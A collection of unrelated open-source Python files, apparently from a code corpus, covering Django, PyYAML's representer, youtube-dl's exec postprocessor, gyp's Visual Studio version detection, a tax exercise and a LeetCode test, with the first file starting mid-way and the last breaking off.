s = codecs.open(ffn, encoding='utf-8').read()
loader(s, cd, filename)
IGNORE_TIMES = False
MODIFY_WINDOW = 2
def must_make(src, target):
"returns True if src is newer than target"
try:
src_st = os.stat(src)
src_mt = src_st.st_mtime
except OSError:
# self.error("os.stat() failed: ",e)
return False
try:
target_st = os.stat(target)
target_mt = target_st.st_mtime
except OSError:
# self.error("os.stat() failed: %s", e)
return True
if src_mt - target_mt > MODIFY_WINDOW:
return True
return False
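# Clarifying note (added): with MODIFY_WINDOW == 2, must_make(src, target)
# is True only when src's mtime exceeds target's by more than two seconds;
# a missing target yields True, a missing src yields False.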
def make_dummy_messages_file(src_fn, messages):
"""
Write a dummy `.py` source file containing
translatable messages that getmessages will find.
"""
raise Exception("Never used")
target_fn = src_fn + '.py'
if not must_make(src_fn, target_fn):
logger.debug("%s is up-to-date.", target_fn)
return
try:
f = open(target_fn, 'w')
except IOError as e:
logger.warning("Could not write file %s : %s", target_fn, e)
return
f.write("# this file is generated by Lino\n")
f.write("from django.utils.translation import ugettext\n")
for m in messages:
f.write("ugettext(%r)\n" % m)
f.close()
logger.info("Wrote %d dummy messages to %s.", len(messages), target_fn)
|
riteshshrv/django
|
refs/heads/master
|
django/contrib/sessions/exceptions.py
|
931
|
from django.core.exceptions import SuspiciousOperation
class InvalidSessionKey(SuspiciousOperation):
"""Invalid characters in session key"""
pass
class SuspiciousSession(SuspiciousOperation):
"""The session may be tampered with"""
pass
|
j5shi/Thruster
|
refs/heads/master
|
pylibs/test/test_xml_etree_c.py
|
12
|
# xml.etree test for cElementTree
from test import test_support
from test.test_support import precisionbigmemtest, _2G
import unittest
cET = test_support.import_module('xml.etree.cElementTree')
# cElementTree specific tests
def sanity():
"""
Import sanity.
>>> from xml.etree import cElementTree
"""
class MiscTests(unittest.TestCase):
# Issue #8651.
@precisionbigmemtest(size=_2G + 100, memuse=1)
def test_length_overflow(self, size):
if size < _2G + 100:
self.skipTest("not enough free memory, need at least 2 GB")
data = b'x' * size
parser = cET.XMLParser()
try:
self.assertRaises(OverflowError, parser.feed, data)
finally:
data = None
def test_main():
from test import test_xml_etree, test_xml_etree_c
# Run the tests specific to the C implementation
test_support.run_doctest(test_xml_etree_c, verbosity=True)
# Assign the C implementation before running the doctests
# Patch the __name__, to prevent confusion with the pure Python test
pyET = test_xml_etree.ET
py__name__ = test_xml_etree.__name__
test_xml_etree.ET = cET
if __name__ != '__main__':
test_xml_etree.__name__ = __name__
try:
# Run the same test suite as xml.etree.ElementTree
test_xml_etree.test_main(module_name='xml.etree.cElementTree')
finally:
test_xml_etree.ET = pyET
test_xml_etree.__name__ = py__name__
if __name__ == '__main__':
test_main()
|
realriot/KinderThek.bundle
|
refs/heads/master
|
Contents/Code/mod_helper.py
|
1
|
debug = True
def getURL(url):
if debug: Log("Fetching content from url: " + url)
# Default to None so a failed request returns None instead of
# raising a NameError on the return below
content = None
try:
content = HTTP.Request(url, cacheTime = CACHE_1HOUR).content
except Exception as e:
if debug: Log(str(e))
return content
|
rlsharpton/Introduction-Programming-Python
|
refs/heads/master
|
Solutions/Module7TaxesChallengeSolution.py
|
19
|
#Declare and initialize your variables
country = ""
province = ""
orderTotal = 0
totalWithTax = 0
#I am declaring variables to hold the tax values used in the calculations
#That way if a tax rate changes, I only have to change it in one place instead
#of searching through my code to see where I had a specific numeric value and updating it
GST = .05
HST = .13
PST = .06
#Ask the user what country they are from
country = input("What country are you from? " )
#if they are from Canada ask which province...don't forget they may enter Canada as CANADA, Canada, canada, CAnada
#so convert the string to lowercase before you do the comparison
if country.lower() == "canada" :
province = input("Which province are you from? ")
#ask for the order total
orderTotal = float(input("What is your order total? "))
#Now add the taxes
#first check if they are from canada
if country.lower() == "canada" :
#if they are from canada, we have to change the calculation based on the province they specified
if province.lower() == "alberta" :
orderTotal = orderTotal + orderTotal * GST
elif province.lower() == "ontario" or province.lower() == "new brunswick" or province.lower() == "nova scotia" :
orderTotal = orderTotal + orderTotal * HST
else :
orderTotal = orderTotal + orderTotal * PST + orderTotal * GST
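#Worked example (illustrative): a $100.00 order from Ontario gets HST,
#so orderTotal becomes 100 + 100 * .13 = 113.00; from any other
#province it gets PST + GST: 100 + 100 * .06 + 100 * .05 = 111.00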
#if they are not from Canada there is no tax, so the amount they entered is the total with tax
#and no modification to orderTotal is required
#Now display the total with taxes to the user, don't forget to format the number
print("Your total including taxes comes to $%.2f " % orderTotal)
|
hickford/youtube-dl
|
refs/heads/master
|
youtube_dl/postprocessor/execafterdownload.py
|
115
|
from __future__ import unicode_literals
import subprocess
from .common import PostProcessor
from ..compat import shlex_quote
from ..utils import PostProcessingError
class ExecAfterDownloadPP(PostProcessor):
def __init__(self, downloader, exec_cmd):
super(ExecAfterDownloadPP, self).__init__(downloader)
self.exec_cmd = exec_cmd
def run(self, information):
cmd = self.exec_cmd
if '{}' not in cmd:
cmd += ' {}'
cmd = cmd.replace('{}', shlex_quote(information['filepath']))
self._downloader.to_screen("[exec] Executing command: %s" % cmd)
retCode = subprocess.call(cmd, shell=True)
if retCode != 0:
raise PostProcessingError(
'Command returned error code %d' % retCode)
return [], information
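# Hedged usage sketch: youtube-dl wires this postprocessor to its --exec
# option, so a call like (file path illustrative)
#
#     youtube-dl --exec 'touch {}' URL
#
# makes run() substitute the shell-quoted filepath for '{}'; a command
# without '{}' gets ' {}' appended, so --exec 'touch' behaves the same.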
|
nsharma283/PCF-php-buildpack
|
refs/heads/master
|
lib/yaml/representer.py
|
360
|
__all__ = ['BaseRepresenter', 'SafeRepresenter', 'Representer',
'RepresenterError']
from error import *
from nodes import *
import datetime
import sys, copy_reg, types
class RepresenterError(YAMLError):
pass
class BaseRepresenter(object):
yaml_representers = {}
yaml_multi_representers = {}
def __init__(self, default_style=None, default_flow_style=None):
self.default_style = default_style
self.default_flow_style = default_flow_style
self.represented_objects = {}
self.object_keeper = []
self.alias_key = None
def represent(self, data):
node = self.represent_data(data)
self.serialize(node)
self.represented_objects = {}
self.object_keeper = []
self.alias_key = None
def get_classobj_bases(self, cls):
bases = [cls]
for base in cls.__bases__:
bases.extend(self.get_classobj_bases(base))
return bases
def represent_data(self, data):
if self.ignore_aliases(data):
self.alias_key = None
else:
self.alias_key = id(data)
if self.alias_key is not None:
if self.alias_key in self.represented_objects:
node = self.represented_objects[self.alias_key]
#if node is None:
# raise RepresenterError("recursive objects are not allowed: %r" % data)
return node
#self.represented_objects[alias_key] = None
self.object_keeper.append(data)
data_types = type(data).__mro__
if type(data) is types.InstanceType:
data_types = self.get_classobj_bases(data.__class__)+list(data_types)
if data_types[0] in self.yaml_representers:
node = self.yaml_representers[data_types[0]](self, data)
else:
for data_type in data_types:
if data_type in self.yaml_multi_representers:
node = self.yaml_multi_representers[data_type](self, data)
break
else:
if None in self.yaml_multi_representers:
node = self.yaml_multi_representers[None](self, data)
elif None in self.yaml_representers:
node = self.yaml_representers[None](self, data)
else:
node = ScalarNode(None, unicode(data))
#if alias_key is not None:
# self.represented_objects[alias_key] = node
return node
def add_representer(cls, data_type, representer):
if not 'yaml_representers' in cls.__dict__:
cls.yaml_representers = cls.yaml_representers.copy()
cls.yaml_representers[data_type] = representer
add_representer = classmethod(add_representer)
def add_multi_representer(cls, data_type, representer):
if not 'yaml_multi_representers' in cls.__dict__:
cls.yaml_multi_representers = cls.yaml_multi_representers.copy()
cls.yaml_multi_representers[data_type] = representer
add_multi_representer = classmethod(add_multi_representer)
def represent_scalar(self, tag, value, style=None):
if style is None:
style = self.default_style
node = ScalarNode(tag, value, style=style)
if self.alias_key is not None:
self.represented_objects[self.alias_key] = node
return node
def represent_sequence(self, tag, sequence, flow_style=None):
value = []
node = SequenceNode(tag, value, flow_style=flow_style)
if self.alias_key is not None:
self.represented_objects[self.alias_key] = node
best_style = True
for item in sequence:
node_item = self.represent_data(item)
if not (isinstance(node_item, ScalarNode) and not node_item.style):
best_style = False
value.append(node_item)
if flow_style is None:
if self.default_flow_style is not None:
node.flow_style = self.default_flow_style
else:
node.flow_style = best_style
return node
def represent_mapping(self, tag, mapping, flow_style=None):
value = []
node = MappingNode(tag, value, flow_style=flow_style)
if self.alias_key is not None:
self.represented_objects[self.alias_key] = node
best_style = True
if hasattr(mapping, 'items'):
mapping = mapping.items()
mapping.sort()
for item_key, item_value in mapping:
node_key = self.represent_data(item_key)
node_value = self.represent_data(item_value)
if not (isinstance(node_key, ScalarNode) and not node_key.style):
best_style = False
if not (isinstance(node_value, ScalarNode) and not node_value.style):
best_style = False
value.append((node_key, node_value))
if flow_style is None:
if self.default_flow_style is not None:
node.flow_style = self.default_flow_style
else:
node.flow_style = best_style
return node
def ignore_aliases(self, data):
return False
class SafeRepresenter(BaseRepresenter):
def ignore_aliases(self, data):
if data in [None, ()]:
return True
if isinstance(data, (str, unicode, bool, int, float)):
return True
def represent_none(self, data):
return self.represent_scalar(u'tag:yaml.org,2002:null',
u'null')
def represent_str(self, data):
tag = None
style = None
try:
data = unicode(data, 'ascii')
tag = u'tag:yaml.org,2002:str'
except UnicodeDecodeError:
try:
data = unicode(data, 'utf-8')
tag = u'tag:yaml.org,2002:str'
except UnicodeDecodeError:
data = data.encode('base64')
tag = u'tag:yaml.org,2002:binary'
style = '|'
return self.represent_scalar(tag, data, style=style)
def represent_unicode(self, data):
return self.represent_scalar(u'tag:yaml.org,2002:str', data)
def represent_bool(self, data):
if data:
value = u'true'
else:
value = u'false'
return self.represent_scalar(u'tag:yaml.org,2002:bool', value)
def represent_int(self, data):
return self.represent_scalar(u'tag:yaml.org,2002:int', unicode(data))
def represent_long(self, data):
return self.represent_scalar(u'tag:yaml.org,2002:int', unicode(data))
inf_value = 1e300
while repr(inf_value) != repr(inf_value*inf_value):
inf_value *= inf_value
def represent_float(self, data):
if data != data or (data == 0.0 and data == 1.0):
value = u'.nan'
elif data == self.inf_value:
value = u'.inf'
elif data == -self.inf_value:
value = u'-.inf'
else:
value = unicode(repr(data)).lower()
# Note that in some cases `repr(data)` represents a float number
# without the decimal parts. For instance:
# >>> repr(1e17)
# '1e17'
# Unfortunately, this is not a valid float representation according
# to the definition of the `!!float` tag. We fix this by adding
# '.0' before the 'e' symbol.
if u'.' not in value and u'e' in value:
value = value.replace(u'e', u'.0e', 1)
return self.represent_scalar(u'tag:yaml.org,2002:float', value)
def represent_list(self, data):
#pairs = (len(data) > 0 and isinstance(data, list))
#if pairs:
# for item in data:
# if not isinstance(item, tuple) or len(item) != 2:
# pairs = False
# break
#if not pairs:
return self.represent_sequence(u'tag:yaml.org,2002:seq', data)
#value = []
#for item_key, item_value in data:
# value.append(self.represent_mapping(u'tag:yaml.org,2002:map',
# [(item_key, item_value)]))
#return SequenceNode(u'tag:yaml.org,2002:pairs', value)
def represent_dict(self, data):
return self.represent_mapping(u'tag:yaml.org,2002:map', data)
def represent_set(self, data):
value = {}
for key in data:
value[key] = None
return self.represent_mapping(u'tag:yaml.org,2002:set', value)
def represent_date(self, data):
value = unicode(data.isoformat())
return self.represent_scalar(u'tag:yaml.org,2002:timestamp', value)
def represent_datetime(self, data):
value = unicode(data.isoformat(' '))
return self.represent_scalar(u'tag:yaml.org,2002:timestamp', value)
def represent_yaml_object(self, tag, data, cls, flow_style=None):
if hasattr(data, '__getstate__'):
state = data.__getstate__()
else:
state = data.__dict__.copy()
return self.represent_mapping(tag, state, flow_style=flow_style)
def represent_undefined(self, data):
raise RepresenterError("cannot represent an object: %s" % data)
SafeRepresenter.add_representer(type(None),
SafeRepresenter.represent_none)
SafeRepresenter.add_representer(str,
SafeRepresenter.represent_str)
SafeRepresenter.add_representer(unicode,
SafeRepresenter.represent_unicode)
SafeRepresenter.add_representer(bool,
SafeRepresenter.represent_bool)
SafeRepresenter.add_representer(int,
SafeRepresenter.represent_int)
SafeRepresenter.add_representer(long,
SafeRepresenter.represent_long)
SafeRepresenter.add_representer(float,
SafeRepresenter.represent_float)
SafeRepresenter.add_representer(list,
SafeRepresenter.represent_list)
SafeRepresenter.add_representer(tuple,
SafeRepresenter.represent_list)
SafeRepresenter.add_representer(dict,
SafeRepresenter.represent_dict)
SafeRepresenter.add_representer(set,
SafeRepresenter.represent_set)
SafeRepresenter.add_representer(datetime.date,
SafeRepresenter.represent_date)
SafeRepresenter.add_representer(datetime.datetime,
SafeRepresenter.represent_datetime)
SafeRepresenter.add_representer(None,
SafeRepresenter.represent_undefined)
class Representer(SafeRepresenter):
def represent_str(self, data):
tag = None
style = None
try:
data = unicode(data, 'ascii')
tag = u'tag:yaml.org,2002:str'
except UnicodeDecodeError:
try:
data = unicode(data, 'utf-8')
tag = u'tag:yaml.org,2002:python/str'
except UnicodeDecodeError:
data = data.encode('base64')
tag = u'tag:yaml.org,2002:binary'
style = '|'
return self.represent_scalar(tag, data, style=style)
def represent_unicode(self, data):
tag = None
try:
data.encode('ascii')
tag = u'tag:yaml.org,2002:python/unicode'
except UnicodeEncodeError:
tag = u'tag:yaml.org,2002:str'
return self.represent_scalar(tag, data)
def represent_long(self, data):
tag = u'tag:yaml.org,2002:int'
if int(data) is not data:
tag = u'tag:yaml.org,2002:python/long'
return self.represent_scalar(tag, unicode(data))
def represent_complex(self, data):
if data.imag == 0.0:
data = u'%r' % data.real
elif data.real == 0.0:
data = u'%rj' % data.imag
elif data.imag > 0:
data = u'%r+%rj' % (data.real, data.imag)
else:
data = u'%r%rj' % (data.real, data.imag)
return self.represent_scalar(u'tag:yaml.org,2002:python/complex', data)
def represent_tuple(self, data):
return self.represent_sequence(u'tag:yaml.org,2002:python/tuple', data)
def represent_name(self, data):
name = u'%s.%s' % (data.__module__, data.__name__)
return self.represent_scalar(u'tag:yaml.org,2002:python/name:'+name, u'')
def represent_module(self, data):
return self.represent_scalar(
u'tag:yaml.org,2002:python/module:'+data.__name__, u'')
def represent_instance(self, data):
# For instances of classic classes, we use __getinitargs__ and
# __getstate__ to serialize the data.
# If data.__getinitargs__ exists, the object must be reconstructed by
# calling cls(**args), where args is a tuple returned by
# __getinitargs__. Otherwise, the cls.__init__ method should never be
# called and the class instance is created by instantiating a trivial
# class and assigning to the instance's __class__ variable.
# If data.__getstate__ exists, it returns the state of the object.
# Otherwise, the state of the object is data.__dict__.
# We produce either a !!python/object or !!python/object/new node.
# If data.__getinitargs__ does not exist and state is a dictionary, we
# produce a !!python/object node . Otherwise we produce a
# !!python/object/new node.
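# Illustrative example (module and class names are hypothetical): an
# old-style instance with __dict__ == {'x': 1} and no __getinitargs__
# is emitted as a mapping node roughly equal to
#   !!python/object:mymod.MyClass {x: 1}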
cls = data.__class__
class_name = u'%s.%s' % (cls.__module__, cls.__name__)
args = None
state = None
if hasattr(data, '__getinitargs__'):
args = list(data.__getinitargs__())
if hasattr(data, '__getstate__'):
state = data.__getstate__()
else:
state = data.__dict__
if args is None and isinstance(state, dict):
return self.represent_mapping(
u'tag:yaml.org,2002:python/object:'+class_name, state)
if isinstance(state, dict) and not state:
return self.represent_sequence(
u'tag:yaml.org,2002:python/object/new:'+class_name, args)
value = {}
if args:
value['args'] = args
value['state'] = state
return self.represent_mapping(
u'tag:yaml.org,2002:python/object/new:'+class_name, value)
def represent_object(self, data):
# We use __reduce__ API to save the data. data.__reduce__ returns
# a tuple of length 2-5:
# (function, args, state, listitems, dictitems)
# For reconstructing, we calls function(*args), then set its state,
# listitems, and dictitems if they are not None.
# A special case is when function.__name__ == '__newobj__'. In this
# case we create the object with args[0].__new__(*args).
# Another special case is when __reduce__ returns a string - we don't
# support it.
# We produce a !!python/object, !!python/object/new or
# !!python/object/apply node.
cls = type(data)
if cls in copy_reg.dispatch_table:
reduce = copy_reg.dispatch_table[cls](data)
elif hasattr(data, '__reduce_ex__'):
reduce = data.__reduce_ex__(2)
elif hasattr(data, '__reduce__'):
reduce = data.__reduce__()
else:
raise RepresenterError("cannot represent object: %r" % data)
reduce = (list(reduce)+[None]*5)[:5]
function, args, state, listitems, dictitems = reduce
args = list(args)
if state is None:
state = {}
if listitems is not None:
listitems = list(listitems)
if dictitems is not None:
dictitems = dict(dictitems)
if function.__name__ == '__newobj__':
function = args[0]
args = args[1:]
tag = u'tag:yaml.org,2002:python/object/new:'
newobj = True
else:
tag = u'tag:yaml.org,2002:python/object/apply:'
newobj = False
function_name = u'%s.%s' % (function.__module__, function.__name__)
if not args and not listitems and not dictitems \
and isinstance(state, dict) and newobj:
return self.represent_mapping(
u'tag:yaml.org,2002:python/object:'+function_name, state)
if not listitems and not dictitems \
and isinstance(state, dict) and not state:
return self.represent_sequence(tag+function_name, args)
value = {}
if args:
value['args'] = args
if state or not isinstance(state, dict):
value['state'] = state
if listitems:
value['listitems'] = listitems
if dictitems:
value['dictitems'] = dictitems
return self.represent_mapping(tag+function_name, value)
Representer.add_representer(str,
Representer.represent_str)
Representer.add_representer(unicode,
Representer.represent_unicode)
Representer.add_representer(long,
Representer.represent_long)
Representer.add_representer(complex,
Representer.represent_complex)
Representer.add_representer(tuple,
Representer.represent_tuple)
Representer.add_representer(type,
Representer.represent_name)
Representer.add_representer(types.ClassType,
Representer.represent_name)
Representer.add_representer(types.FunctionType,
Representer.represent_name)
Representer.add_representer(types.BuiltinFunctionType,
Representer.represent_name)
Representer.add_representer(types.ModuleType,
Representer.represent_module)
Representer.add_multi_representer(types.InstanceType,
Representer.represent_instance)
Representer.add_multi_representer(object,
Representer.represent_object)
|
zhlinh/leetcode
|
refs/heads/master
|
0108.Convert Sorted Array to Binary Search Tree/test.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from solution import Solution
from solution import TreeNode
def constructOne(s):
s = s.strip()
if s == '#':
return None
else:
return TreeNode(int(s))
def createTree(tree):
q = []
tree = tree.split(",")
root = constructOne(tree[0])
q.append(root)
idx = 1
while q:
tn = q.pop(0)
if not tn:
continue
if idx == len(tree):
break
left = constructOne(tree[idx])
tn.left = left
q.append(left)
idx += 1
if idx == len(tree):
break
right = constructOne(tree[idx])
idx += 1
tn.right = right
q.append(right)
return root
def printNode(tn, indent):
sb = ""
for i in range(indent):
sb += "\t"
sb += str(tn.val)
print(sb)
def printTree(root, indent):
if not root:
return
printTree(root.right, indent + 1)
printNode(root, indent)
printTree(root.left, indent + 1)
nums = [1, 2, 3, 4, 5]
sol = Solution()
res = sol.sortedArrayToBST(nums)
printTree(res, 0)
|
aayushchugh07/qbo-browser
|
refs/heads/master
|
btp3/cgi/test4.py
|
3
|
#!/usr/bin/env python
print "Content-type: text/html"
print
# print "<html><head><title>Situation snapshot</title></head>"
# print "<body><pre>"
# print "fff"
# objects=['Book_copy','Book_'];
# for object in objects:
# print object;
# print "</pre></body></html>"
print '''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Library-QBO</title>
<!-- Bootstrap -->
<link href="/css/bootstrap.min.css" rel="stylesheet">
<!-- Extra theme that will screw up everything -->
<!-- link href="/css/bootstrap-theme.min.css" rel="stylesheet" -->
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<!-- h2>Library-QBO</h2 -->
<div class="navbar navbar-default">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">Library-QBO</a>
</div>
<div class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li class="active"><a href="#">Home</a></li>
<li><a href="#about">About</a></li>
<li><a href="#contact">Contact</a></li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown <b class="caret"></b></a>
<ul class="dropdown-menu">
<li><a href="#">Action</a></li>
<li><a href="#">Another action</a></li>
<li><a href="#">Something else here</a></li>
<li class="divider"></li>
<li class="dropdown-header">Nav header</li>
<li><a href="#">Separated link</a></li>
<li><a href="#">One more separated link</a></li>
</ul>
</li>
</ul>
</div><!--/.nav-collapse -->
</div>
</div>
<hr />
<h3>Tables</h3>
<p>Click on a table to add a new bag</p>
<div class="row">
<!-- Put elements below with div class=col-md-2 to get wrapping in columns -->
<!-- div class="col-md-2">
<h2>Heading</h2>
<p>Donec id elit non mi porta gravida at eget metus. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui. </p>
<p><a class="btn btn-default" href="#" role="button">View details »</a></p>
</div -->
<div class="col-md-1">
<div align="center">
<img src="/images/People.png" width="60px" height="60px" />
</div>
<p align="center">Customers</p>
</div>
<div class="col-md-1">
<div align="center">
<img src="/images/People.png" width="60px" height="60px" />
</div>
<p align="center">Customers</p>
</div>
<div class="col-md-1">
<div align="center">
<img src="/images/People.png" width="60px" height="60px" />
</div>
<p align="center">Customers</p>
</div>
</div> <!-- /row -->
<hr />
<h3>Bags</h3>
<p>Select one or two bags to perform operations</p>
<div class="row">
<div class="col-md-1">
<div align="center" style="padding-top: 12px;">
<img src="/images/People.png" width="60px" height="60px" />
</div>
<p align="center">Customers</p>
</div>
<div class="col-md-2">
<div class="panel panel-default">
<div class="panel-heading">
<div align="center" class="dropdown-toggle" data-toggle="dropdown">
<img src="/images/People.png" width="60px" height="60px" align="center"/>
<button class="btn btn-info dropdown-toggle" data-toggle="dropdown" data-hover="dropdown"><b class="caret"></b></button>
<ul class="dropdown-menu" align="center">
<li><a tabindex="-1" href="#">View data</a></li>
<li class="divider"></li>
<li><a tabindex="-1" href="#">Deselect</a></li>
<li><a tabindex="-1" href="#">Delete</a></li>
</ul>
<p align="center">Customers</p>
</div>
</div>
</div>
</div>
</div>
<hr />
<h3>Operations</h3>
<p>Click on an operation for selected table(s)</p>
<div class="row">
<div class="col-md-1">
<div align="center">
<img src="/images/People.png" width="60px" height="60px" align="center"/>
<p align="center">Operation2</p>
</div>
</div>
<div class="col-md-1">
<div align="center">
<img src="/images/People.png" width="60px" height="60px" align="center"/>
<p align="center">Operation1</p>
</div>
</div>
</div>
<!-- /div -->
<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
<!-- Include all compiled plugins (below), or include individual files as needed -->
<script src="/js/bootstrap.min.js"></script>
<!-- <div class="dropdown theme-dropdown clearfix"> -->
<!-- <a id="dropdownMenu1" href="#" role="button" class="sr-only dropdown-toggle" data-toggle="dropdown" > -->
<!-- >Dropdown <b class="caret"></b></a > -->
<!-- <ul class="dropdown-menu" role="menu" aria-labelledby="dropdownMenu1" > -->
<!-- <li class="active" role="presentation"><a role="menuitem" tabindex="-1" href="#">Action</a></li> -->
<!-- <li role="presentation"><a role="menuitem" tabindex="-1" href="#">Another action</a></li> -->
<!-- <li role="presentation"><a role="menuitem" tabindex="-1" href="#">Something else here</a></li> -->
<!-- <li role="presentation" class="divider"></li> -->
<!-- <li role="presentation"><a role="menuitem" tabindex="-1" href="#">Separated link</a></li> -->
<!-- </ul > -->
<!-- </div> -->
<!-- <div class="btn-group"> -->
<!-- <button class="btn btn-primary dropdown-toggle" data-toggle="dropdown" data-hover="dropdown">Primary <span class="caret"></span></button> -->
<!-- <class="dropdown-menu"> -->
<!-- <ul> -->
<!-- <li><a href="#">Action</a></li> -->
<!-- <li><a href="#">Another action</a></li> -->
<!-- <li><a href="#">Something else here</a></li> -->
<!-- <li class="divider"></li> -->
<!-- <li><a href="#">Separated link</a></li> -->
<!-- </ul> -->
<!-- </div> <\!-- .btn-group -\-> -->
<!-- <a href="#" class="dropdown-toggle js-activated" data-toggle="dropdown">Contact <b class="caret"></b></a> -->
</body>
</html>
'''
|
joegesualdo/dotfiles
|
refs/heads/master
|
config/yarn/global/node_modules/node-gyp/gyp/pylib/gyp/MSVSVersion.py
|
1509
|
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Handle version information related to Visual Stuio."""
import errno
import os
import re
import subprocess
import sys
import gyp
import glob
class VisualStudioVersion(object):
"""Information regarding a version of Visual Studio."""
def __init__(self, short_name, description,
solution_version, project_version, flat_sln, uses_vcxproj,
path, sdk_based, default_toolset=None):
self.short_name = short_name
self.description = description
self.solution_version = solution_version
self.project_version = project_version
self.flat_sln = flat_sln
self.uses_vcxproj = uses_vcxproj
self.path = path
self.sdk_based = sdk_based
self.default_toolset = default_toolset
def ShortName(self):
return self.short_name
def Description(self):
"""Get the full description of the version."""
return self.description
def SolutionVersion(self):
"""Get the version number of the sln files."""
return self.solution_version
def ProjectVersion(self):
"""Get the version number of the vcproj or vcxproj files."""
return self.project_version
def FlatSolution(self):
return self.flat_sln
def UsesVcxproj(self):
"""Returns true if this version uses a vcxproj file."""
return self.uses_vcxproj
def ProjectExtension(self):
"""Returns the file extension for the project."""
return self.uses_vcxproj and '.vcxproj' or '.vcproj'
def Path(self):
"""Returns the path to Visual Studio installation."""
return self.path
def ToolPath(self, tool):
"""Returns the path to a given compiler tool. """
return os.path.normpath(os.path.join(self.path, "VC/bin", tool))
def DefaultToolset(self):
"""Returns the msbuild toolset version that will be used in the absence
of a user override."""
return self.default_toolset
def SetupScript(self, target_arch):
"""Returns a command (with arguments) to be used to set up the
environment."""
# Check if we are running in the SDK command line environment and use
# the setup script from the SDK if so. |target_arch| should be either
# 'x86' or 'x64'.
assert target_arch in ('x86', 'x64')
sdk_dir = os.environ.get('WindowsSDKDir')
if self.sdk_based and sdk_dir:
return [os.path.normpath(os.path.join(sdk_dir, 'Bin/SetEnv.Cmd')),
'/' + target_arch]
else:
# We don't use VC/vcvarsall.bat for x86 because vcvarsall calls
# vcvars32, which it can only find if VS??COMNTOOLS is set, which it
# isn't always.
if target_arch == 'x86':
if self.short_name >= '2013' and self.short_name[-1] != 'e' and (
os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
# VS2013 and later, non-Express have a x64-x86 cross that we want
# to prefer.
return [os.path.normpath(
os.path.join(self.path, 'VC/vcvarsall.bat')), 'amd64_x86']
# Otherwise, the standard x86 compiler.
return [os.path.normpath(
os.path.join(self.path, 'Common7/Tools/vsvars32.bat'))]
else:
assert target_arch == 'x64'
arg = 'x86_amd64'
# Use the 64-on-64 compiler if we're not using an express
# edition and we're running on a 64bit OS.
if self.short_name[-1] != 'e' and (
os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
arg = 'amd64'
return [os.path.normpath(
os.path.join(self.path, 'VC/vcvarsall.bat')), arg]
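# Illustrative sketch (the install path is hypothetical): on a 64-bit
# host a non-Express VS2013 yields
#   SetupScript('x86') -> [r'C:\...\VC\vcvarsall.bat', 'amd64_x86']
#   SetupScript('x64') -> [r'C:\...\VC\vcvarsall.bat', 'amd64']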
def _RegistryQueryBase(sysdir, key, value):
"""Use reg.exe to read a particular key.
While ideally we might use the win32 module, we would like gyp to be
python neutral, so for instance cygwin python lacks this module.
Arguments:
sysdir: The system subdirectory to attempt to launch reg.exe from.
key: The registry key to read from.
value: The particular value to read.
Return:
stdout from reg.exe, or None for failure.
"""
# Skip if not on Windows or Python Win32 setup issue
if sys.platform not in ('win32', 'cygwin'):
return None
# Setup params to pass to and attempt to launch reg.exe
cmd = [os.path.join(os.environ.get('WINDIR', ''), sysdir, 'reg.exe'),
'query', key]
if value:
cmd.extend(['/v', value])
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Obtain the stdout from reg.exe, reading to the end so p.returncode is valid
# Note that the error text may be in [1] in some cases
text = p.communicate()[0]
# Check return code from reg.exe; officially 0==success and 1==error
if p.returncode:
return None
return text
def _RegistryQuery(key, value=None):
r"""Use reg.exe to read a particular key through _RegistryQueryBase.
First tries to launch from %WinDir%\Sysnative to avoid WoW64 redirection. If
that fails, it falls back to System32. Sysnative is available on Vista and
up and available on Windows Server 2003 and XP through KB patch 942589. Note
that Sysnative will always fail if using 64-bit python due to it being a
virtual directory and System32 will work correctly in the first place.
KB 942589 - http://support.microsoft.com/kb/942589/en-us.
Arguments:
key: The registry key.
value: The particular registry value to read (optional).
Return:
stdout from reg.exe, or None for failure.
"""
text = None
try:
text = _RegistryQueryBase('Sysnative', key, value)
except OSError, e:
if e.errno == errno.ENOENT:
text = _RegistryQueryBase('System32', key, value)
else:
raise
return text
def _RegistryGetValueUsingWinReg(key, value):
"""Use the _winreg module to obtain the value of a registry key.
Args:
key: The registry key.
value: The particular registry value to read.
Return:
contents of the registry key's value, or None on failure. Throws
ImportError if _winreg is unavailable.
"""
import _winreg
try:
root, subkey = key.split('\\', 1)
assert root == 'HKLM' # Only need HKLM for now.
with _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, subkey) as hkey:
return _winreg.QueryValueEx(hkey, value)[0]
except WindowsError:
return None
def _RegistryGetValue(key, value):
"""Use _winreg or reg.exe to obtain the value of a registry key.
Using _winreg is preferable because it solves an issue on some corporate
environments where access to reg.exe is locked down. However, we still need
to fallback to reg.exe for the case where the _winreg module is not available
(for example in cygwin python).
Args:
key: The registry key.
value: The particular registry value to read.
Return:
contents of the registry key's value, or None on failure.
"""
try:
return _RegistryGetValueUsingWinReg(key, value)
except ImportError:
pass
# Fallback to reg.exe if we fail to import _winreg.
